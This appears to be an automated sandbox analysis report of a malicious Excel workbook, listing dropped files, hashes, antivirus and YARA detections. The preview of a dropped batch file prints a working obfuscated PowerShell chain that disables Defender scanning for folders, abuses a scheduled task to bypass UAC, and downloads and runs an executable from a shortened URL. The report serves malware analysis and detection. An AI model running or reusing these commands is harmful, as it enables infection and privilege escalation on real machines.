                                                        SSDEEP:3:kkFklCwJNl/tfllXlE/QhzllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1UAYpFc:kKPmRliBAIdQZV7eAYLit
                                                        MD5:F541E4217A2CBE51440A4BA11A78F387
                                                        SHA1:1B37FCF58B5F607D761A4BCAEE4556A913E574CC
                                                        SHA-256:A35B8C5CD442FB4486F2A8782176D2CBBF2ADF45D9B97AFA66E718E76289CC75
                                                        SHA-512:943F0026126E8763D5882FD05AAC609D2274CF313B952B2D5D096BEBEA85C18FDED81968F3CBDB5EEAD12DAAAE05D7E2F2FB93DD54D3525FC7F28DFB36C5C860
                                                        Malicious:false
                                                        Preview: p...... ....`....B......(....................................................... ........u.........(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.9.e.7.6.b.3.c.6.4.b.c.0."...
                                                        C:\Users\user\AppData\LocalLow\frAQBc8Wsa
                                                        Process:C:\Users\user\AppData\Roaming\cr.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):40960
                                                        Entropy (8bit):0.7798653713156546
                                                        Encrypted:false
                                                        SSDEEP:48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u
                                                        MD5:CD5ACB5FAA79EEB4CDB481C6939EEC15
                                                        SHA1:527F3091889C553B87B6BC0180E903E2931CCCFE
                                                        SHA-256:D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96
                                                        SHA-512:A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D
                                                        Malicious:false
                                                        C:\Users\user\AppData\LocalLow\sqlite3.dll
                                                        Process:C:\Users\user\AppData\Roaming\cr.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):916735
                                                        Entropy (8bit):6.514932604208782
                                                        Encrypted:false
                                                        SSDEEP:24576:BJDwWdxW2SBNTjlY24eJoyGttl3+FZVpsq/2W:BJDvx0BY24eJoyctl3+FTX
                                                        MD5:F964811B68F9F1487C2B41E1AEF576CE
                                                        SHA1:B423959793F14B1416BC3B7051BED58A1034025F
                                                        SHA-256:83BC57DCF282264F2B00C21CE0339EAC20FCB7401F7C5472C0CD0C014844E5F7
                                                        SHA-512:565B1A7291C6FCB63205907FCD9E72FC2E11CA945AFC4468C378EDBA882E2F314C2AC21A7263880FF7D4B84C2A1678024C1AC9971AC1C1DE2BFA4248EC0F98C4
                                                        Malicious:false
                                                        Antivirus:
                                                        • Antivirus: Metadefender, Detection: 0%
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Joe Sandbox View:
                                                        • Filename: COO_TPE0269320_image2020-12-31-055841.exe, Detection: malicious
                                                        • Filename: sek750_2021.exe, Detection: malicious
                                                        • Filename: 0I2ddZZKv7.exe, Detection: malicious
                                                        • Filename: Q2BZ01fmwK.exe, Detection: malicious
                                                        • Filename: fiUdG0AFun.exe, Detection: malicious
                                                        • Filename: sU0m70ahcm.exe, Detection: malicious
                                                        • Filename: vDKnVBINrY.exe, Detection: malicious
                                                        • Filename: HOJAsmBUjl.exe, Detection: malicious
                                                        • Filename: FwkgiBlwcg.exe, Detection: malicious
                                                        • Filename: 0XxTmF8pEW.exe, Detection: malicious
                                                        • Filename: uMtPsgsHU2.exe, Detection: malicious
                                                        • Filename: ZJaczSqbMl.exe, Detection: malicious
                                                        • Filename: 53CmqAXIHb.exe, Detection: malicious
                                                        • Filename: VWOhpUmgcP.exe, Detection: malicious
                                                        • Filename: S5N3DvtQ0h.exe, Detection: malicious
                                                        • Filename: q7ryNCLGYT.exe, Detection: malicious
                                                        • Filename: rZ28UGXv3X.exe, Detection: malicious
                                                        • Filename: SecuriteInfo.com.BehavesLike.Win32.Trojan.gc.exe, Detection: malicious
                                                        • Filename: SecuriteInfo.com.BehavesLike.Win32.Trojan.gc.exe, Detection: malicious
                                                        • Filename: 530ppafC4x.exe, Detection: malicious
                                                        C:\Users\user\AppData\Local\Temp\741F0000
                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):265254
                                                        Entropy (8bit):7.974700866105644
                                                        Encrypted:false
                                                        SSDEEP:6144:nrDk/RQb44UWE035WaNeoYOcAYiyJTs9Q8yWz:nnLxUWGaNesYbTH8yq
                                                        MD5:0486A5D5BC90F4A9CDFE127660C9C324
                                                        SHA1:D92C02486FB7718F44CADD647B0FA01CF32DAE9F
                                                        SHA-256:6AA194CFD6889FD8F6BB56520EA3D5C9A80E01E939DCC3AF1FD80D3649F332AF
                                                        SHA-512:814EB1B5142BB4AF632233CB5629EE4F6E0A8A4DEC10DA7DF33D89EB3F6C4B6102C638098BFCA318BEE88A4BB549E90C87F7403D7D3BAD92B711CF78B08CDEA8
                                                        Malicious:false
                                                        C:\Users\user\AppData\Local\Temp\Cab6613.tmp
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                                        Category:dropped
                                                        Size (bytes):58936
                                                        Entropy (8bit):7.994797855729196
                                                        Encrypted:true
                                                        SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                                        MD5:E4F1E21910443409E81E5B55DC8DE774
                                                        SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                                        SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                                        SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                                        Malicious:false
                                                        C:\Users\user\AppData\Local\Temp\Tar6614.tmp
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):152533
                                                        Entropy (8bit):6.31602258454967
                                                        Encrypted:false
                                                        SSDEEP:1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
                                                        MD5:D0682A3C344DFC62FB18D5A539F81F61
                                                        SHA1:09D3E9B899785DA377DF2518C6175D70CCF9DA33
                                                        SHA-256:4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
                                                        SHA-512:0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3
                                                        Malicious:false
                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Fri Jan 8 16:05:56 2021, atime=Fri Jan 8 16:05:56 2021, length=8192, window=hide
                                                        Category:dropped
                                                        Size (bytes):867
                                                        Entropy (8bit):4.489503739489606
                                                        Encrypted:false
                                                        SSDEEP:12:85QMCLgXg/XAlCPCHaX5B8zDXB/h8X+WnicvbUbDtZ3YilMMEpxRljKGwyTdJP9O:85LU/XTp6zLcYe0Dv3qHwqrNru/
                                                        MD5:1AF82EB593899CBB3FE4C0A5963DB3CE
                                                        SHA1:2FD54A6ED91E337FECF797A8AA84C94CB85E5B9E
                                                        SHA-256:6C968B89F756B291AA577E52DA6B094932C5449F652AF331289FC0F866CDCE64
                                                        SHA-512:3348A5E9D0980CD5AC39791B1AACEAE44E6F3C1EB706DD90AEB359EA031048BA8C04A6507E565991E66A9F90A77D73D0D8C59375C84455234B70FDB36E6DA33D
                                                        Malicious:false
                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):83
                                                        Entropy (8bit):4.42866744313446
                                                        Encrypted:false
                                                        SSDEEP:3:oyBVomMUVnRJpSIJdnRJpSmMUVnRJpSv:dj6MnxfdnxEMnxc
                                                        MD5:ABFBBA964FE194830991FC3EDDE3FB4A
                                                        SHA1:7E2AD416D70C53F0E3A6C31035D55C670D70A57E
                                                        SHA-256:D855D7448592A8D2F464D582E53D2346D55F3E09F765D2CC18229B09BF3EBA90
                                                        SHA-512:D647981A3C6787C6F6DBFCED8F20F7B42BB420C6DE38C005A2B22174CD66692254271B669EF79C4691ED3F9AAE796E13D15EC7E145BCE4BC1ABA5B804DA5D409
                                                        Malicious:false
                                                        Preview: Desktop.LNK=0..[xls]..ul9kpUwYel.LNK=0..ul9kpUwYel.LNK=0..[xls]..ul9kpUwYel.LNK=0..
                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\ul9kpUwYel.LNK
                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:24 2020, mtime=Fri Jan 8 16:05:56 2021, atime=Fri Jan 8 16:05:56 2021, length=289280, window=hide
                                                        Category:dropped
                                                        Size (bytes):2028
                                                        Entropy (8bit):4.521373297611859
                                                        Encrypted:false
                                                        SSDEEP:48:85q/XTgzLZGhZnHTQh25q/XTgzLZGhZnHTQ/:8A/X8zLZaRHTQh2A/X8zLZaRHTQ/
                                                        MD5:4C6C05FC98365660BEFCC68B5251A03A
                                                        SHA1:053431E4A2C81C6AF52E24F3DF897999F033F663
                                                        SHA-256:9100D1D9AD54608B6C427B1610E7CD548F56325AD46DDD05F3DE97E6A031EA2F
                                                        SHA-512:A6DFEE4C7A1A04627EE1718A921754B1AA3088BA25FCD361F41D1D0FFBB7CD6CBAAAB260A7B873A428FA9A57393D6C5D8E0B5E55196DB87BAD3D8485B5E04AF2
                                                        Malicious:false
                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1LYCPT5GDMC5WV088G26.temp
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):8016
                                                        Entropy (8bit):3.5899129888051573
                                                        Encrypted:false
                                                        SSDEEP:96:chQCsMqUqvsqvJCwoxTz8hQCsMqUqvsEHyqvJCwornTzjLdYxH2Tf8CLWlUVjTIu:cydolz8yFHnorTzjLLf8CLtIu
                                                        MD5:A74F06C6226FEE2F93B9D38B04E2ADF0
                                                        SHA1:2CED57A3382081C72D47A0A14F503EFF3F1BA4A4
                                                        SHA-256:14131C28D276C034941040BAFB82A770FE83B041B3241F88ABDCD05B43AB8703
                                                        SHA-512:DB04E5B68A92D44F3A08988E7CBEAD80EF57F1748BBD591882466E8907C111C55E2B2A225CDDA1B7BFE4FF81277C94E0B288A006806ED710CE519CD9C1109093
                                                        Malicious:false
                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\20519T597D0EZEFAD1MF.temp
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):8016
                                                        Entropy (8bit):3.5899129888051573
                                                        Encrypted:false
                                                        SSDEEP:96:chQCsMqUqvsqvJCwoxTz8hQCsMqUqvsEHyqvJCwornTzjLdYxH2Tf8CLWlUVjTIu:cydolz8yFHnorTzjLLf8CLtIu
                                                        MD5:A74F06C6226FEE2F93B9D38B04E2ADF0
                                                        SHA1:2CED57A3382081C72D47A0A14F503EFF3F1BA4A4
                                                        SHA-256:14131C28D276C034941040BAFB82A770FE83B041B3241F88ABDCD05B43AB8703
                                                        SHA-512:DB04E5B68A92D44F3A08988E7CBEAD80EF57F1748BBD591882466E8907C111C55E2B2A225CDDA1B7BFE4FF81277C94E0B288A006806ED710CE519CD9C1109093
                                                        Malicious:false
                                                        Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PNBQABH49BUBWNJMEEIM.temp
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):8016
                                                        Entropy (8bit):3.5899129888051573
                                                        Encrypted:false
                                                        SSDEEP:96:chQCsMqUqvsqvJCwoxTz8hQCsMqUqvsEHyqvJCwornTzjLdYxH2Tf8CLWlUVjTIu:cydolz8yFHnorTzjLLf8CLtIu
                                                        MD5:A74F06C6226FEE2F93B9D38B04E2ADF0
                                                        SHA1:2CED57A3382081C72D47A0A14F503EFF3F1BA4A4
                                                        SHA-256:14131C28D276C034941040BAFB82A770FE83B041B3241F88ABDCD05B43AB8703
                                                        SHA-512:DB04E5B68A92D44F3A08988E7CBEAD80EF57F1748BBD591882466E8907C111C55E2B2A225CDDA1B7BFE4FF81277C94E0B288A006806ED710CE519CD9C1109093
                                                        Malicious:false
                                                        Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\T70ZP6LTUP685KT127GQ.temp
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):8016
                                                        Entropy (8bit):3.5899129888051573
                                                        Encrypted:false
                                                        SSDEEP:96:chQCsMqUqvsqvJCwoxTz8hQCsMqUqvsEHyqvJCwornTzjLdYxH2Tf8CLWlUVjTIu:cydolz8yFHnorTzjLLf8CLtIu
                                                        MD5:A74F06C6226FEE2F93B9D38B04E2ADF0
                                                        SHA1:2CED57A3382081C72D47A0A14F503EFF3F1BA4A4
                                                        SHA-256:14131C28D276C034941040BAFB82A770FE83B041B3241F88ABDCD05B43AB8703
                                                        SHA-512:DB04E5B68A92D44F3A08988E7CBEAD80EF57F1748BBD591882466E8907C111C55E2B2A225CDDA1B7BFE4FF81277C94E0B288A006806ED710CE519CD9C1109093
                                                        Malicious:false
                                                        Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\W2MFNCCZKET1DP3F8CLA.temp
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):8016
                                                        Entropy (8bit):3.5899129888051573
                                                        Encrypted:false
                                                        SSDEEP:96:chQCsMqUqvsqvJCwoxTz8hQCsMqUqvsEHyqvJCwornTzjLdYxH2Tf8CLWlUVjTIu:cydolz8yFHnorTzjLLf8CLtIu
                                                        MD5:A74F06C6226FEE2F93B9D38B04E2ADF0
                                                        SHA1:2CED57A3382081C72D47A0A14F503EFF3F1BA4A4
                                                        SHA-256:14131C28D276C034941040BAFB82A770FE83B041B3241F88ABDCD05B43AB8703
                                                        SHA-512:DB04E5B68A92D44F3A08988E7CBEAD80EF57F1748BBD591882466E8907C111C55E2B2A225CDDA1B7BFE4FF81277C94E0B288A006806ED710CE519CD9C1109093
                                                        Malicious:false
                                                        Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XLLWWEN87DPEWAHB9XA5.temp
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):8016
                                                        Entropy (8bit):3.5899129888051573
                                                        Encrypted:false
                                                        SSDEEP:96:chQCsMqUqvsqvJCwoxTz8hQCsMqUqvsEHyqvJCwornTzjLdYxH2Tf8CLWlUVjTIu:cydolz8yFHnorTzjLLf8CLtIu
                                                        MD5:A74F06C6226FEE2F93B9D38B04E2ADF0
                                                        SHA1:2CED57A3382081C72D47A0A14F503EFF3F1BA4A4
                                                        SHA-256:14131C28D276C034941040BAFB82A770FE83B041B3241F88ABDCD05B43AB8703
                                                        SHA-512:DB04E5B68A92D44F3A08988E7CBEAD80EF57F1748BBD591882466E8907C111C55E2B2A225CDDA1B7BFE4FF81277C94E0B288A006806ED710CE519CD9C1109093
                                                        Malicious:false
                                                        Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                        C:\Users\user\AppData\Roaming\cr.exe
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                        Category:dropped
                                                        Size (bytes):565248
                                                        Entropy (8bit):7.234649741813346
                                                        Encrypted:false
                                                        SSDEEP:12288:4olpZq/qtrvH5GxZ8cyGdGYa3JbD/ON/5Eg:4orZq/q9CYG8YAJbDmN
                                                        MD5:740E559929463320CB8E0403FD35A097
                                                        SHA1:CFE5A0BF2D21B6C36930DCC942849086DDEC9134
                                                        SHA-256:BAB37B37285FABDDA77B8C7EEA78B97EE1EF087DF7ECA796E3D49C4205DE6BD1
                                                        SHA-512:D56B448064828AEEC98536CAA9F3264327871FABA16D8B8FAD48D9C2781C994D93C2A85DE1C3EDAEC5EC736671673FFFF24D46C8070B960FED9A5958DD9C6501
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 72%
                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........e*...y...y...y..y..y..y..y..y...y.rpy...y...y...y..y...y..y...y..y...yRich...y................PE..L......^.................0........7..6?...7...@...@...........................@..............................................q@.`.....@..q..................................................T8?.......?.H...........................................UPX0......7.............................UPX1.....0....7..(..................@....rsrc.........@..t...,..............@......................................................................................................................................................................................................................................................................................................................................................................................................3.95.UPX!....
                                                        C:\Users\user\Desktop\251F0000
                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        File Type:Applesoft BASIC program data, first line number 16
                                                        Category:dropped
                                                        Size (bytes):297703
                                                        Entropy (8bit):7.748820416386462
                                                        Encrypted:false
                                                        SSDEEP:6144:nk3hbdlylKsgqopeJBWhZFVE+W2Nd00PRkbE4ASEg7R6aNeMs64oYiyJT4JQIMWg:nn9ASKaNeEYLTfIM3
                                                        MD5:62B4022B1E29913ECFA4F5D47807C60E
                                                        SHA1:EAEF7910733990E9D863040550E459D2EEAE7943
                                                        SHA-256:1BF64FCE96A41E7121C1A12698171DDFED3FE227941AA61E69F378C3AF405587
                                                        SHA-512:90C980B3A9FB4045A5951506BF9350D7861FFEF5203EEDFDA1751B840994D5BFE30DE9BC8597B028F07B9C101D2EAA99AFD0008AAC595A37A212712B36AC8974
                                                        Malicious:false
                                                        Preview: ........g2..........................\.p....user B.....a.........=..............ThisWorkbook....................................=........K^)8.......X.@...........".......................1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1. .................C.o.n.s.o.l.a.s.1...................A.r.i.a.l.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.*.h...6...........C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6...........C.a.l.i.b.r.i.1.......6..
                                                        C:\Users\user\Documents\pd.bat
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with very long lines, with CRLF line terminators
                                                        Category:modified
                                                        Size (bytes):2000
                                                        Entropy (8bit):5.3585901083999214
                                                        Encrypted:false
                                                        SSDEEP:48:dnjA3VfSfC/7vUVfSfC/7vQVfSfC/7vu1AQ:dnM30K/Q0K/k0K/sAQ
                                                        MD5:C771FD125198A4C0339E354183CD48A9
                                                        SHA1:47399A8E8FC4FE8A41703A587EC26C2837C6BA3A
                                                        SHA-256:9B46B9922BE2E0A9CDEE75F02F86C6CA9ECA965A2CA84EAAB8A997A2BC11E768
                                                        SHA-512:5BBA903C99973959CD090AB1483F66AA2B13823F180E26C369892996A6163E6E28BC4623C1CCE095ED6D3A944F384A84058313B2DC847B2EE92B9185C797C2FC
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: SUSP_PowerShell_Caret_Obfuscation_2, Description: Detects powershell keyword obfuscated with carets, Source: C:\Users\user\Documents\pd.bat, Author: Florian Roth
                                                        • Rule: JoeSecurity_ObfuscatedPowershell, Description: Yara detected Obfuscated Powershell, Source: C:\Users\user\Documents\pd.bat, Author: Joe Security
                                                        Preview: mode 18,1..color FE..setlocal..for /f "tokens=4-5 delims=. " %%i in ('ver') do set VERSION=%%i.%%j..if "%version%" == "10.0" ( echo "Windows 10 detected" ..reg add "HKCU\Environment" /v "windir" /d "cmd /c start p^owersh^el^l -w 1 Add-MpPreference -ExclusionPath "$env:temp" ;Add-MpPreference -ExclusionPath "$env:appdata" ;Start-Sleep 12; (New-Object Net.WebClient).DownloadFile('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;&REM " >nul..timeout /t 2 >nul..schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I >nul..timeout /t 3 >nul..reg delete "HKCU\Environment" /v "windir" /F..)..if "%version%" == "6.3" ( echo "Windows 8.1 detected" ..reg add "HKCU\Environment" /v "windir" /d "cmd /c start p^owersh^el^l -w 1 Add-MpPreference -ExclusionPath "$env:temp" ;Add-MpPreference -ExclusionPath "$env:appdata" ;Start-Sleep 12; (New-Object Net.WebClient).DownloadFile('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2;

                                                        Static File Info

                                                        General

                                                        File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Last Saved By: blobijump, Create Time/Date: Sun Sep 20 22:17:44 2020, Last Saved Time/Date: Sun Jan 3 23:14:32 2021, Security: 1
                                                        Entropy (8bit):7.822763112772762
                                                        TrID:
                                                        • Microsoft Excel sheet (30009/1) 47.99%
                                                        • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                        • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                        File name:ul9kpUwYel.xls
                                                        File size:281600
                                                        MD5:c2ca4d5f2632597023b6cf5b496fb4ed
                                                        SHA1:076f6120eb80059c41e8d731d59471a2e9d81ad8
                                                        SHA256:1ed66ae579df680aae0c4469e916cc97a943e9f600a4d55767755456d6079c75
                                                        SHA512:67c000984f8811626fcebb522b21399a29bc51fbddae108c08af6760cf57720ffc87eb4fdb448cfe4a8d0f355e30a46f804619dfb7cccadcbfae9a3e1339c4ca
                                                        SSDEEP:6144:fnSGiysRchNXHfA1MiWhZFVEld+Dr7EU/RdbM4oSEIbWyaNekMiYg4iyJTQJQgTH:2WloSVaNeM4rT3gTH
                                                        File Content Preview:........................;...................................#..................................................................................................................................................................................................

                                                        File Icon

                                                        Icon Hash:e4eea286a4b4bcb4

                                                        Static OLE Info

                                                        General

                                                        Document Type:OLE
                                                        Number of OLE Files:1

                                                        OLE File "ul9kpUwYel.xls"

                                                        Indicators

                                                        Has Summary Info:True
                                                        Application Name:unknown
                                                        Encrypted Document:False
                                                        Contains Word Document Stream:False
                                                        Contains Workbook/Book Stream:True
                                                        Contains PowerPoint Document Stream:False
                                                        Contains Visio Document Stream:False
                                                        Contains ObjectPool Stream:
                                                        Flash Objects Count:
                                                        Contains VBA Macros:True

                                                        Summary

                                                        Code Page:1252
                                                        Last Saved By:blobijump
                                                        Create Time:2020-09-20 21:17:44
                                                        Last Saved Time:2021-01-03 23:14:32
                                                        Security:1

